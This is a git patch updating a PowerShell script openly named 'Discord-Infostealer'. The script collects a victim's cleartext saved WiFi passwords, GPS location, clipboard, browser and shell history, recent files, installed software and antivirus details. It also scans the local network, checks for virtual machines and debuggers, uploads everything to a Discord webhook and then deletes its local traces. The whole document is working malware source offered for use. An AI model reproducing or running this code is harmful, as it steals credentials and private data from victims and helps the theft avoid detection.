From 6437f06715fdc2dfd2f6d9671c9f01e55d9b3d72 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Tue, 31 Dec 2024 22:32:51 +0000 Subject: [PATCH] Update main.ps1 --- Discord-Infostealer/main.ps1 | 497 +++++++++++++++++++++++++---------- 1 file changed, 352 insertions(+), 145 deletions(-) diff --git a/Discord-Infostealer/main.ps1 b/Discord-Infostealer/main.ps1 index 16bd8ee..82e7aa6 100644 --- a/Discord-Infostealer/main.ps1 +++ b/Discord-Infostealer/main.ps1 @@ -14,67 +14,98 @@ else{ } sleep 1 -$hookurl = "$dc" -# shortened URL Detection -if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url} - -$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":computer: ``Gathering System Information for $env:COMPUTERNAME.. Please wait`` :computer:"} | ConvertTo-Json -Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys - Add-Type -AssemblyName System.Windows.Forms -# WMI Classes -$systemInfo = Get-WmiObject -Class Win32_OperatingSystem -$userInfo = Get-WmiObject -Class Win32_UserAccount -$processorInfo = Get-WmiObject -Class Win32_Processor -$computerSystemInfo = Get-WmiObject -Class Win32_ComputerSystem -$userInfo = Get-WmiObject -Class Win32_UserAccount -$videocardinfo = Get-WmiObject Win32_VideoController -$Hddinfo = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, FileSystem, @{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,FileSystem,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } ;$Hddinfo=($Hddinfo| Out-String) ;$Hddinfo = ("$Hddinfo").TrimEnd("") -$RamInfo = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} -$processor = "$($processorInfo.Name)" -$gpu = "$($videocardinfo.Name)" -$DiskHealth = Get-PhysicalDisk | Select-Object DeviceID, FriendlyName, OperationalStatus, HealthStatus; $DiskHealth = ($DiskHealth | Out-String) -$ver = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').DisplayVersion +$hookurl = "$dc" + +# Send a notification to discord on start +$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":computer: ``Gathering System Information for $env:COMPUTERNAME`` :computer:"} | ConvertTo-Json +Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys # User Information +$userInfo = Get-WmiObject -Class Win32_UserAccount $fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("") $email = (Get-ComputerInfo).WindowsRegisteredOwner -$systemLocale = Get-WinSystemLocale;$systemLanguage = $systemLocale.Name -$userLanguageList = Get-WinUserLanguageList;$keyboardLayoutID = $userLanguageList[0].InputMethodTips[0] -$OSString = "$($systemInfo.Caption)" -$OSArch = "$($systemInfo.OSArchitecture)" -$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content + +# Other Users $users = "$($userInfo.Name)" $userString = "`nFull Name : $($userInfo.FullName)" -$clipboard = Get-Clipboard -# System Information -$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table; $usbdevices = ($COMDevices| Out-String) -$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath; $process = ($process| Out-String) -$service=Get-CimInstance -ClassName Win32_Service | select State,Name,StartName,PathName | Where-Object {$_.State -like 'Running'}; $service = ($service | Out-String) -$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize; $software = ($software| Out-String) -$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion -$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt";$pshistory = Get-Content $pshist -raw ;$pshistory = ($pshistory | Out-String) -$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 100 FullName, LastWriteTime;$RecentFiles = ($RecentFiles | Out-String) -$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;$Width = $Screen.Width;$Height = $Screen.Height;$screensize = "${width} x ${height}" +# System Language +$systemLocale = Get-WinSystemLocale +$systemLanguage = $systemLocale.Name -# Nearby WiFi Networks -$showNetworks = explorer.exe ms-availablenetworks: -sleep 4 +#Keyboard Layout +$userLanguageList = Get-WinUserLanguageList +$keyboardLayoutID = $userLanguageList[0].InputMethodTips[0] -$wshell = New-Object -ComObject wscript.shell -$wshell.AppActivate('explorer.exe') -$tab = 0 -while ($tab -lt 6){ -$wshell.SendKeys('{TAB}') -$tab++ +# OS Information +$systemInfo = Get-WmiObject -Class Win32_OperatingSystem +$OSString = "$($systemInfo.Caption)" +$WinVersion = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').DisplayVersion +$OSArch = "$($systemInfo.OSArchitecture)" +$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen +$Width = $Screen.Width;$Height = $Screen.Height +$screensize = "${width} x ${height}" + +# Enumerate Windows Activation Date +function Convert-BytesToDatetime([byte[]]$b) { + [long]$f = ([long]$b[7] -shl 56) -bor ([long]$b[6] -shl 48) -bor ([long]$b[5] -shl 40) -bor ([long]$b[4] -shl 32) -bor ([long]$b[3] -shl 24) -bor ([long]$b[2] -shl 16) -bor ([long]$b[1] -shl 8) -bor [long]$b[0] + $script:activated = [datetime]::FromFileTime($f) } -$wshell.SendKeys('{ENTER}') -$wshell.SendKeys('{TAB}') -$wshell.SendKeys('{ESC}') -$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Signal*" -or $_ -like "*Band*"}).trim() | Format-Table SSID, Signal, Band -$Wifi = ($NearbyWifi|Out-String) +$RegKey = (Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\ProductOptions").ProductPolicy +$totalSize = ([System.BitConverter]::ToUInt32($RegKey,0)) +$policies = @() +$value = 0x14 +while ($true){ + $keySize = ([System.BitConverter]::ToUInt16($RegKey,$value)) + $keyNameSize = ([System.BitConverter]::ToUInt16($RegKey,$value+2)) + $keyDataSize = ([System.BitConverter]::ToUInt16($RegKey,$value+6)) + $keyName = [System.Text.Encoding]::Unicode.GetString($RegKey[($value+0x10)..($value+0xF+$keyNameSize)]) + if ($keyName -eq 'Security-SPP-LastWindowsActivationTime'){ + Convert-BytesToDatetime($RegKey[($value+0x10+$keyNameSize)..($value+0xF+$keyNameSize+$keyDataSize)]) + } + $value += $keySize + if (($value+4) -ge $totalSize){ + break + } +} + +# GPS Location Info +Add-Type -AssemblyName System.Device +$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher +$GeoWatcher.Start() +while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {Sleep -M 100} +if ($GeoWatcher.Permission -eq 'Denied'){$GPS = "Location Services Off"} +else{ + $GL = $GeoWatcher.Position.Location | Select Latitude,Longitude + $GL = $GL -split " " + $Lat = $GL[0].Substring(11) -replace ".$" + $Lon = $GL[1].Substring(10) -replace ".$" + $GPS = "LAT = $Lat LONG = $Lon" +} + +# Hardware Information +$processorInfo = Get-WmiObject -Class Win32_Processor; $processor = "$($processorInfo.Name)" +$videocardinfo = Get-WmiObject Win32_VideoController; $gpu = "$($videocardinfo.Name)" +$RamInfo = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} +$computerSystemInfo = Get-WmiObject -Class Win32_ComputerSystem | Out-String +$computerSystemInfo = $computerSystemInfo -split "`r?`n" | Where-Object { $_ -ne '' } | Out-String + +# HDD Information +$HddInfo = Get-WmiObject Win32_LogicalDisk | + Select-Object DeviceID, VolumeName, FileSystem, + @{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, + @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, + @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | + Format-List +$HddInfo = ($HddInfo | Out-String) -replace '^\s*$(\r?\n|\r)', '' | ForEach-Object { $_.Trim() } + +# Disk Health +$DiskHealth = Get-PhysicalDisk | + Select-Object FriendlyName, OperationalStatus, HealthStatus | + Format-List +$DiskHealth = ($DiskHealth | Out-String) -replace '^\s*$(\r?\n|\r)', '' | ForEach-Object { $_.Trim() } # Current System Metrics function Get-PerformanceMetrics { @@ -96,6 +127,168 @@ $PMmu = "Memory Usage: $($metrics.MemoryUsage)%" $PMdio = "Disk I/O: $($metrics.DiskIO) transfers/sec" $PMnio = "Network I/O: $($metrics.NetworkIO) bytes/sec" +#Anti-virus Info +$AVinfo = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Select-Object -ExpandProperty displayName +$AVinfo | ForEach-Object { $_.Trim() } +$AVinfo = ($AVinfo | Out-String) -replace '^\s*$(\r?\n|\r)', '' | ForEach-Object { $_.Trim() } + +# Enumerate Network Public IP +$computerPubIP = (Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content + +# Saved WiFi Network Info +$outssid = $null +$a=0 +$ws=(netsh wlan show profiles) -replace ".*:\s+" +foreach($s in $ws){ + if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ + $ssid=$s.Trim() + if($s -Match ":"){ + $ssid=$s.Split(":")[1].Trim() + } + $pw=(netsh wlan show profiles name=$ssid key=clear) + $pass="None" + foreach($p in $pw){ + if($p -Match "Key Content"){ + $pass=$p.Split(":")[1].Trim() + $outssid+="SSID: $ssid | Password: $pass`n" + } + } + } + $a++ +} + +# Get the local IPv4 address +$localIP = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object SuffixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress) + +if ($localIP -match '^(\d{1,3}\.\d{1,3}\.\d{1,3})\.\d{1,3}$') { + $subnet = $matches[1] + + 1..254 | ForEach-Object { + Start-Process -WindowStyle Hidden ping.exe -ArgumentList "-n 1 -l 0 -f -i 2 -w 100 -4 $subnet.$_" + } + + # Retrieve the list of computers in the subnet + $Computers = (arp.exe -a | Select-String "$subnet.*dynam") -replace ' +',',' | ConvertFrom-Csv -Header Computername,IPv4,MAC | Where-Object { $_.MAC -ne 'dynamic' } | Select-Object IPv4, MAC, Computername + + # Add Hostname property and build scan result + $scanresult = "" + $Computers | ForEach-Object { + try { + $ip = $_.IPv4 + $hostname = ([System.Net.Dns]::GetHostEntry($ip)).HostName + $_ | Add-Member -MemberType NoteProperty -Name "Hostname" -Value $hostname -Force + } catch { + $_ | Add-Member -MemberType NoteProperty -Name "Hostname" -Value "Error: $($_.Exception.Message)" -Force + } + + $scanresult += "IP Address: $($_.IPv4) `n" + $scanresult += "MAC Address: $($_.MAC) `n" + if ($_.Hostname) { + $scanresult += "Hostname: $($_.Hostname) `n" + } + $scanresult += "`n" + } +} + +# Nearby WiFi Networks +$showNetworks = explorer.exe ms-availablenetworks: +sleep 4 +$wshell = New-Object -ComObject wscript.shell +$wshell.AppActivate('explorer.exe') +$tab = 0 +while ($tab -lt 6){ +$wshell.SendKeys('{TAB}') +$tab++ +} +$wshell.SendKeys('{ENTER}') +$wshell.SendKeys('{TAB}') +$wshell.SendKeys('{ESC}') +$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Signal*" -or $_ -like "*Band*"}).trim() | Format-Table SSID, Signal, Band +$Wifi = ($NearbyWifi|Out-String) + + +#Virtual Machine Detection Setup +$isVM = $false +$isDebug = $false +$screen = [System.Windows.Forms.Screen]::PrimaryScreen +$Width = $screen.Bounds.Width +$Height = $screen.Bounds.Height +$networkAdapters = Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object { $_.MACAddress -ne $null } +$services = Get-Service +$vmServices = @('vmtools', 'vmmouse', 'vmhgfs', 'vmci', 'VBoxService', 'VBoxSF') +$manufacturer = (Get-WmiObject Win32_ComputerSystem).Manufacturer +$vmManufacturers = @('Microsoft Corporation', 'VMware, Inc.', 'Xen', 'innotek GmbH', 'QEMU') +$model = (Get-WmiObject Win32_ComputerSystem).Model +$vmModels = @('Virtual Machine', 'VirtualBox', 'KVM', 'Bochs') +$bios = (Get-WmiObject Win32_BIOS).Manufacturer +$vmBios = @('Phoenix Technologies LTD', 'innotek GmbH', 'Xen', 'SeaBIOS') +$runningTaskManagers = @() + +# Debugger Check +Add-Type @" + using System; + using System.Runtime.InteropServices; + + public class DebuggerCheck { + [DllImport("kernel32.dll")] + public static extern bool IsDebuggerPresent(); + + [DllImport("kernel32.dll", SetLastError=true)] + public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); + } +"@ +$isDebuggerPresent = [DebuggerCheck]::IsDebuggerPresent() +$isRemoteDebuggerPresent = $false +[DebuggerCheck]::CheckRemoteDebuggerPresent([System.Diagnostics.Process]::GetCurrentProcess().Handle, [ref]$isRemoteDebuggerPresent) | Out-Null +if ($isDebuggerPresent -or $isRemoteDebuggerPresent) { + $script:isdebug = $true +} + +#Virtual Machine Indicators +$commonResolutions = @("1280x720","1280x800","1280x1024","1366x768","1440x900","1600x900","1680x1050","1920x1080","1920x1200","2560x1440","3840x2160") +$vmChecks = @{"VMwareTools" = "HKLM:\SOFTWARE\VMware, Inc.\VMware Tools";"VMwareMouseDriver" = "C:\WINDOWS\system32\drivers\vmmouse.sys";"VMwareSharedFoldersDriver" = "C:\WINDOWS\system32\drivers\vmhgfs.sys";"SystemBiosVersion" = "HKLM:\HARDWARE\Description\System\SystemBiosVersion";"VBoxGuestAdditions" = "HKLM:\SOFTWARE\Oracle\VirtualBox Guest Additions";"VideoBiosVersion" = "HKLM:\HARDWARE\Description\System\VideoBiosVersion";"VBoxDSDT" = "HKLM:\HARDWARE\ACPI\DSDT\VBOX__";"VBoxFADT" = "HKLM:\HARDWARE\ACPI\FADT\VBOX__";"VBoxRSDT" = "HKLM:\HARDWARE\ACPI\RSDT\VBOX__";"SystemBiosDate" = "HKLM:\HARDWARE\Description\System\SystemBiosDate";} +$taskManagers = @("taskmgr","procmon","procmon64","procexp","procexp64","perfmon","perfmon64","resmon","resmon64","ProcessHacker") +$currentResolution = "$Width`x$Height" +if (!($commonResolutions -contains $currentResolution)) {$rescheck = "Resolution Check : PASS"}else{$rescheck = "Resolution Check : FAIL"} +if ($vmManufacturers -contains $manufacturer) {$ManufaturerCheck = "Manufaturer Check : FAIL"}else{$ManufaturerCheck = "Manufaturer Check : PASS"} +if ($vmModels -contains $model) {$ModelCheck = "Model Check : FAIL"}else{$ModelCheck = "Model Check : PASS"} +if ($vmBios -contains $bios) {$BiosCheck = "Bios Check : FAIL"}else{$BiosCheck = "Bios Check : PASS"} + +foreach ($service in $vmServices) {if ($services -match $service) {$script:isVM = $true}} +foreach ($check in $vmChecks.GetEnumerator()) {if (Test-Path $check.Value) {$script:isVM = $true}} +foreach ($adapter in $networkAdapters) { + $macAddress = $adapter.MACAddress -replace ":", "" + if ($macAddress.StartsWith("080027")) {$script:isVM = $true} + elseif ($macAddress.StartsWith("000569") -or $macAddress.StartsWith("000C29") -or $macAddress.StartsWith("001C14")) {$script:isVM = $true} +} + +# List Running Task Managers +foreach ($taskManager in $taskManagers) { + if (Get-Process -Name $taskManager -ErrorAction SilentlyContinue) { + $runningTaskManagers += $taskManager + } +} +if (!($runningTaskManagers)){ + $runningTaskManagers = "None Found.." +} + +if ($isVM) { + $vmD = "FAIL!" +} +else{ + $vmD = "PASS" +} +if ($isDebug) { + $debugD = "FAIL!" +} +else { + $debugD = "PASS" + } +$vmDetect = "VM Check : $vmD" +$debugDetect = "Debugging Check : $debugD" + + +$clipboard = Get-Clipboard # History and Bookmark Data $Expression = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' $Paths = @{ @@ -115,9 +308,9 @@ foreach ($Browser in $Browsers) { $PathKey = "${Browser}_${DataValue}" $Path = $Paths[$PathKey] - $Value = Get-Content -Path $Path | Select-String -AllMatches $Expression | % {($_.Matches).Value} | Sort -Unique + $entry = Get-Content -Path $Path | Select-String -AllMatches $Expression | % {($_.Matches).Value} | Sort -Unique - $Value | ForEach-Object { + $entry | ForEach-Object { [PSCustomObject]@{ Browser = $Browser DataType = $DataValue @@ -126,51 +319,19 @@ foreach ($Browser in $Browsers) { } | Out-File -FilePath $outpath -Append } } -$Value = Get-Content -Path $outpath -$Value = ($Value | Out-String) +$entry = Get-Content -Path $outpath +$entry = ($entry | Out-String) -# Saved WiFi Network Info -$outssid = '' -$a=0 -$ws=(netsh wlan show profiles) -replace ".*:\s+" -foreach($s in $ws){ - if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ - $ssid=$s.Trim() - if($s -Match ":"){ - $ssid=$s.Split(":")[1].Trim() - } - $pw=(netsh wlan show profiles name=$ssid key=clear) - $pass="None" - foreach($p in $pw){ - if($p -Match "Key Content"){ - $pass=$p.Split(":")[1].Trim() - $outssid+="SSID: $ssid | Password: $pass`n-----------------------`n" - } - } - } - $a++ -} - -# GPS Location Info -Add-Type -AssemblyName System.Device -$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher -$GeoWatcher.Start() -while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { - Sleep -M 100 -} -if ($GeoWatcher.Permission -eq 'Denied'){ - $GPS = "Location Services Off" -} -else{ - $GL = $GeoWatcher.Position.Location | Select Latitude,Longitude - $GL = $GL -split " " - $Lat = $GL[0].Substring(11) -replace ".$" - $Lon = $GL[1].Substring(10) -replace ".$" - $GPS = "LAT = $Lat LONG = $Lon" -} +# System Information +$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table; $usbdevices = ($COMDevices| Out-String) +$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath; $process = ($process| Out-String) +$service=Get-CimInstance -ClassName Win32_Service | select State,Name,StartName,PathName | Where-Object {$_.State -like 'Running'}; $service = ($service | Out-String) +$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize; $software = ($software| Out-String) +$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion +$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt";$pshistory = Get-Content $pshist -raw ;$pshistory = ($pshistory | Out-String) +$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 100 FullName, LastWriteTime;$RecentFiles = ($RecentFiles | Out-String) function EnumNotepad{ - $appDataDir = [Environment]::GetFolderPath('LocalApplicationData') $directoryRelative = "Packages\Microsoft.WindowsNotepad_*\LocalState\TabState" $matchingDirectories = Get-ChildItem -Path (Join-Path -Path $appDataDir -ChildPath 'Packages') -Filter 'Microsoft.WindowsNotepad_*' -Directory @@ -219,27 +380,9 @@ foreach ($dir in $matchingDirectories) { } } -function Convert-BytesToDatetime([byte[]]$b) { - [long]$f = ([long]$b[7] -shl 56) -bor ([long]$b[6] -shl 48) -bor ([long]$b[5] -shl 40) -bor ([long]$b[4] -shl 32) -bor ([long]$b[3] -shl 24) -bor ([long]$b[2] -shl 16) -bor ([long]$b[1] -shl 8) -bor [long]$b[0] - $script:activated = [datetime]::FromFileTime($f) -} -$bArr = (Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\ProductOptions").ProductPolicy -$totalSize = ([System.BitConverter]::ToUInt32($bArr,0)) -$policies = @() -$ip = 0x14 -while ($true){ - $eSize = ([System.BitConverter]::ToUInt16($bArr,$ip)) - $eNameSize = ([System.BitConverter]::ToUInt16($bArr,$ip+2)) - $eDataSize = ([System.BitConverter]::ToUInt16($bArr,$ip+6)) - $eName = [System.Text.Encoding]::Unicode.GetString($bArr[($ip+0x10)..($ip+0xF+$eNameSize)]) - if ($eName -eq 'Security-SPP-LastWindowsActivationTime'){ - Convert-BytesToDatetime($bArr[($ip+0x10+$eNameSize)..($ip+0xF+$eNameSize+$eDataSize)]) - } - $ip += $eSize - if (($ip+4) -ge $totalSize){ - break - } -} + + + $infomessage = " ================================================================================================================================== _________ __ .__ _____ __ .__ @@ -251,54 +394,92 @@ $infomessage = " ================================================================================================================================== " -$infomessage1 = "`````` -============================================================= +$infomessage1 = " +======================================= SYSTEM INFORMATION FOR $env:COMPUTERNAME -============================================================= +======================================= User Information -------------------------------------------------------------- -Current User : $env:USERNAME -Email Address : $email -Language : $systemLanguage -Keyboard Layout : $keyboardLayoutID -Other Accounts : $users -Current OS : $OSString -Build ID : $ver -Architechture : $OSArch -Screen Size : $screensize -Location : $GPS -Activation Date : $activated -============================================================= +--------------------------------------- +Current User : $env:USERNAME +Full Name : $fullName +Email Address : $email +Other Users : $users + +OS Information +--------------------------------------- +Language : $systemLanguage +Keyboard Layout : $keyboardLayoutID +Current OS : $OSString +Build ID : $WinVersion +Architechture : $OSArch +Screen Size : $screensize +Activation Date : $activated +Location : $GPS + Hardware Information -------------------------------------------------------------- -Processor : $processor -Memory : $RamInfo -Gpu : $gpu +--------------------------------------- +Processor : $processor +Memory : $RamInfo +Gpu : $gpu + +System Information +--------------------------------------- +$computerSystemInfo Storage ----------------------------------------- +--------------------------------------- $Hddinfo $DiskHealth + Current System Metrics ----------------------------------------- +--------------------------------------- $PMcpu $PMmu $PMdio $PMnio -============================================================= + +AntiVirus Providers +--------------------------------------- +$AVinfo + Network Information -------------------------------------------------------------- -Public IP Address : $computerPubIP -``````" -$infomessage2 = " +--------------------------------------- +Public IP Address : $computerPubIP +Local IP Address : $localIP Saved WiFi Networks ----------------------------------------- +--------------------------------------- $outssid Nearby Wifi Networks ----------------------------------------- +--------------------------------------- $Wifi + +Other Network Devices +--------------------------------------- +$scanresult + +Virtual Machine Test +--------------------------------------- +$rescheck +$ManufaturerCheck +$ModelCheck +$BiosCheck +$vmDetect + +Debugging Software Check +--------------------------------------- +$debugDetect + +Running Task Managers +--------------------------------------- +$runningTaskManagers + +" + + +$infomessage2 = " + ================================================================================================================================== History Information ---------------------------------------------------------------------------------------------------------------------------------- @@ -307,7 +488,7 @@ Clipboard Contents $clipboard Browser History ----------------------------------------- +--------------------------------------- $Value Powershell History @@ -353,9 +534,35 @@ else{ "no notepad tabs (windows 10 or below)" | Out-File -FilePath $outpath -Encoding ASCII -Append } -$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = "$infomessage1"} | ConvertTo-Json + +function Send-WebhookMessage { + param ( + [string]$content + ) +$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = "$content"} | ConvertTo-Json Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys +} + +$resultLines = $infomessage1 -split "`n" + $currentBatch = "" + foreach ($line in $resultLines) { + $lineSize = [System.Text.Encoding]::Unicode.GetByteCount($line) + + if (([System.Text.Encoding]::Unicode.GetByteCount($currentBatch) + $lineSize) -gt 1900) { + Send-WebhookMessage -content "``````$currentBatch`````` " + Start-Sleep -Seconds 1 + $currentBatch = "" + } + + $currentBatch += $line + "`n" + } + + if ($currentBatch -ne "") { + Send-WebhookMessage -content "``````$currentBatch`````` " + } + curl.exe -F file1=@"$outpath" $hookurl Sleep 1 Remove-Item -Path $outpath -force +